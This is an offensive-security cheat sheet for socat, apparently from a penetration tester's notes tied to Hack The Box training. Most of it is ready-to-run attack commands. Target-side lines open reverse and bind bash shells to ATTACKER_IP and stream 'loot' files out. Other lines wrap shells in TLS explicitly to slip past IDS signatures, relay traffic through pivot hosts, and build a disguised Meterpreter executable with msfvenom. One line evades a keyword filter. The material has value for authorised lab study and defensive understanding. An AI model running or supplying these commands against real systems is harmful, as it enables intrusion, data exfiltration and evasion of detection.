socat.md (9854B)
1 --- 2 title: "Socat" 3 description: "Socat recipes for bind/reverse shells, TCP/UDP relays, TLS-wrapped tunnels, port forwarding and file transfer." 4 category: tunneling-pivoting 5 tags: ["tunneling-pivoting", "relay", "pivoting", "tunneling"] 6 tools: ["Nmap", "Metasploit", "Meterpreter", "socat", "OpenSSL"] 7 difficulty: intermediate 8 updated: "2026-08-28" 9 source: "vault:Tools/Socat-Cheatsheet.md" 10 --- 11 # Socat — Cheat Sheet 12 13 ## Summary 14 15 `socat` (SOcket CAT) is a bidirectional relay that connects any two data channels, sockets, files, pipes, PTYs, TLS tunnels, and processes, and pumps bytes between them. In offensive work it earns its place three ways: as a hardened catcher for reverse and bind shells (including fully interactive PTYs), as an encrypted transport that survives IDS inspection, and as a dependency-free redirector for pivoting when SSH is not available on the foothold. This sheet is a fast lookup for the exact command shapes, with the small flags that make the difference between a dumb shell and a stable one. 16 17 > [!danger]+ Authorisation Boundary 18 > 19 > 1. Use only against **Hack The Box**, lab, or explicitly authorised targets. 20 > 2. Shells and relays cross network boundaries. Stay in scope and remove listeners, relays, and dropped binaries when finished. 21 22 --- 23 24 ## Conceptual Information 25 26 ### Address syntax 27 28 Every socat invocation is `socat [options] <address1> <address2>`. socat opens both addresses and shuttles data between them. An address is a type plus comma-separated options, for example `TCP4-LISTEN:4444,fork,reuseaddr`. 29 30 | Address type | Meaning | 31 |---|---| 32 | `TCP4-LISTEN:PORT` | Listen for an inbound TCP connection | 33 | `TCP4:HOST:PORT` | Make an outbound TCP connection | 34 | `UDP4-LISTEN:PORT` / `UDP4:H:P` | UDP equivalents | 35 | `EXEC:'cmd',...` | Run a program and wire its stdio to the other address | 36 | `FILE:` `` `tty` ``,raw,echo=0 | Attach the operator's own terminal | 37 | `OPENSSL:H:P` / `OPENSSL-LISTEN:P` | TLS-wrapped connection | 38 | `STDIO` / `-` | Standard input/output | 39 40 | Common option | Effect | 41 |---|---| 42 | `fork` | Handle each new connection in a child, so the listener survives disconnects | 43 | `reuseaddr` | Rebind the port immediately without waiting out TIME_WAIT | 44 | `pty` | Allocate a pseudo-terminal for the executed program | 45 | `stderr` | Merge the program's stderr into the channel | 46 | `setsid` | Run in a new session so job control and signals behave | 47 | `sigint,sane` | Forward Ctrl-C and reset sane terminal settings | 48 | `raw,echo=0` | Put the local terminal in raw mode with no local echo | 49 50 > [!info]+ [socat](http://www.dest-unreach.org/socat/doc/socat.html) Overview 51 > 52 > A multipurpose relay for bidirectional byte streams between two independent channels. 53 > 1. Needs no SSH daemon or credentials on a pivot host, only the ability to run the binary. 54 > 2. Wraps shells in a real PTY, giving arrow keys, tab-completion, and job control that plain `nc` cannot. 55 > 3. Speaks TLS natively, so shell traffic can be encrypted end to end. 56 57 --- 58 59 ## Reverse Shells 60 61 The target connects back to you. Best when the target can reach out but you cannot reach in. 62 63 ```bash 64 # Attacker: listener that hands the connection to your own terminal 65 socat -d -d TCP4-LISTEN:4444,fork,reuseaddr FILE:`tty`,raw,echo=0 66 ``` 67 68 ```bash 69 # Target: connect back with an interactive bash PTY 70 socat TCP4:ATTACKER_IP:4444 EXEC:'bash',pty,stderr,setsid,sigint,sane 71 ``` 72 73 > [!info]+ Command Breakdown 74 > 75 > 1. `-d -d` raises verbosity so you see connection events, handy while debugging. 76 > 2. `FILE:`` `tty` ``,raw,echo=0` binds your live terminal in raw mode, this is what makes the caught shell fully interactive. 77 > 3. `EXEC:'bash',pty,stderr,setsid,sigint,sane` on the target spawns bash inside a PTY, forwards stderr, starts a new session, and keeps Ctrl-C and terminal settings sane. 78 79 > [!success]+ Why this beats nc 80 > 81 > 1. You get a real TTY: tab-completion, `su`/`sudo` prompts that need a terminal, `vi`, and job control all work. 82 > 2. No need for the manual `python3 -c 'pty.spawn'` upgrade dance. 83 84 --- 85 86 ## Bind Shells 87 88 The target listens, you connect in. Best when the target accepts inbound connections but cannot call out. 89 90 ```bash 91 # Target: listen and serve a bash PTY to whoever connects 92 socat TCP4-LISTEN:4444,fork,reuseaddr EXEC:'bash',pty,stderr,setsid,sigint,sane 93 ``` 94 95 ```bash 96 # Attacker: connect and attach your terminal 97 socat FILE:`tty`,raw,echo=0 TCP4:TARGET_IP:4444 98 ``` 99 100 > [!info]+ Command Breakdown 101 > 102 > 1. The listen/exec sides are simply swapped compared with the reverse shell. 103 > 2. `fork` keeps the target listener alive across reconnects, drop it for a strict one-shot. 104 105 --- 106 107 ## Encrypted Shells (TLS) 108 109 Wrap the whole shell in TLS so an IDS sees only opaque ciphertext. Generate a cert once, then use `OPENSSL` addresses on both ends. 110 111 ```bash 112 # Attacker: generate a self-signed cert + key, bundle to a .pem 113 openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt \ 114 -subj "/CN=update.local" 115 cat shell.key shell.crt > shell.pem 116 ``` 117 118 ```bash 119 # Attacker: TLS listener 120 socat -d -d OPENSSL-LISTEN:4444,cert=shell.pem,verify=0,fork FILE:`tty`,raw,echo=0 121 ``` 122 123 ```bash 124 # Target: TLS connect-back with a PTY bash 125 socat OPENSSL:ATTACKER_IP:4444,verify=0 EXEC:'bash',pty,stderr,setsid,sigint,sane 126 ``` 127 128 > [!warning]+ Encryption notes 129 > 130 > 1. `verify=0` disables certificate validation, fine for a lab, but it means no protection against interception. Use pinned certs for anything real. 131 > 2. TLS-wrapped shells defeat signature-based network detection that keys on plaintext shell prompts and commands. 132 > 3. Only the `.pem` (key + cert) is needed on the listener side, the target just needs to trust-skip with `verify=0`. 133 134 --- 135 136 ## Redirection & Pivoting 137 138 socat as a relay: forward a port on a pivot host on to somewhere the attacker cannot reach directly. No SSH required. 139 140 ```bash 141 # On the pivot: forward every inbound 8080 connection on to the attacker's 80 142 socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80 143 ``` 144 145 ```bash 146 # On the pivot: forward inbound 8080 to an internal host's bind port 8443 147 socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443 148 ``` 149 150 > [!info]+ Command Breakdown 151 > 152 > 1. `TCP4-LISTEN:8080,fork` accepts many concurrent connections on the pivot, `fork` is essential for more than one. 153 > 2. For a **reverse** shell through a pivot, point the payload's `LHOST` at the *pivot's* internal IP, socat completes the hop to your listener. 154 > 3. For a **bind** shell through a pivot, point the Metasploit handler's `RHOST` at the *pivot*, socat completes the hop to the target's listener. 155 156 > [!example]+ Metasploit through a socat redirector 157 > 158 > ```bash 159 > # reverse_https payload aimed at the pivot, socat relays to your real handler 160 > msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 LPORT=8080 \ 161 > -f exe -o backupscript.exe 162 > # handler on the attack host 163 > # set payload windows/x64/meterpreter/reverse_https ; set lhost 0.0.0.0 ; set lport 80 ; run 164 > ``` 165 166 --- 167 168 ## File Transfer 169 170 ```bash 171 # Receiver (attacker): write incoming bytes to a file 172 socat -u TCP4-LISTEN:9000,reuseaddr OPEN:loot.tar,creat 173 174 # Sender (target): stream a file out 175 socat -u FILE:/tmp/loot.tar TCP4:ATTACKER_IP:9000 176 ``` 177 178 > [!tip]+ Transfer flags 179 > 180 > 1. `-u` is unidirectional (address1 to address2 only), the natural fit for a one-way copy. 181 > 2. `OPEN:file,creat` creates the destination, add `,append` to concatenate. 182 > 3. TLS file transfer is the same with `OPENSSL`/`OPENSSL-LISTEN` addresses. 183 184 --- 185 186 ## Getting socat onto a Target 187 188 > [!tip]+ When socat is not installed 189 > 190 > 1. Check first with a filter-safe probe, e.g. `which socat` (split the name if a word filter is in play: `'w'h'i'ch${IFS}socat`). 191 > 2. Grab a [statically compiled socat binary](https://github.com/andrew-d/static-binaries) and drop it via your existing RCE or file-transfer channel, then `chmod +x`. 192 > 3. If neither works, fall back to `ncat --ssl --sh-exec` (ships with Nmap) for a comparable encrypted shell. 193 194 --- 195 196 ## Quick Reference 197 198 | Goal | Attacker | Target | 199 |---|---|---| 200 | Reverse shell | `socat -d -d TCP4-LISTEN:4444,fork FILE:`` `tty` ``,raw,echo=0` | `socat TCP4:IP:4444 EXEC:'bash',pty,stderr,setsid,sigint,sane` | 201 | Bind shell | `socat FILE:`` `tty` ``,raw,echo=0 TCP4:IP:4444` | `socat TCP4-LISTEN:4444,fork EXEC:'bash',pty,stderr,setsid,sigint,sane` | 202 | Encrypted rev | `socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0,fork FILE:`` `tty` ``,raw,echo=0` | `socat OPENSSL:IP:4444,verify=0 EXEC:'bash',pty,...` | 203 | Port redirect | `socat TCP4-LISTEN:8080,fork TCP4:INTERNAL:PORT` (on pivot) | connect to pivot:8080 | 204 | File pull | `socat -u TCP4-LISTEN:9000 OPEN:loot,creat` | `socat -u FILE:loot TCP4:IP:9000` | 205 206 --- 207 208 ## Lessons Learned 209 210 1. `FILE:`` `tty` ``,raw,echo=0` on your side plus `EXEC:'bash',pty,stderr,setsid,sigint,sane` on the target is the canonical fully-interactive shell, memorise it. 211 2. `fork` on any listener is what lets it survive reconnects, forgetting it gives you exactly one shot per run. 212 3. TLS (`OPENSSL`) shells encrypt traffic end to end and slip past plaintext signatures, a cheap evasion upgrade over `nc`. 213 4. For pivoting, the relay direction flips between reverse and bind shells: for reverse, socat sits between target and your listener, for bind, between your handler and the target's listener. 214 5. socat needs no SSH or credentials on the pivot, only the ability to execute the binary, which makes it ideal after a limited RCE or web shell. 215 216 --- 217 218 ## References 219 220 1. [socat man page](http://www.dest-unreach.org/socat/doc/socat.html) 221 2. [HTB Academy — Pivoting, Tunneling and Port Forwarding](https://academy.hackthebox.com/module/details/158) 222 3. [static-binaries — prebuilt socat](https://github.com/andrew-d/static-binaries) 223 4. [Ncat Users' Guide](https://nmap.org/ncat/guide/index.html) 224 5. [GTFOBins — socat](https://gtfobins.github.io/gtfobins/socat/)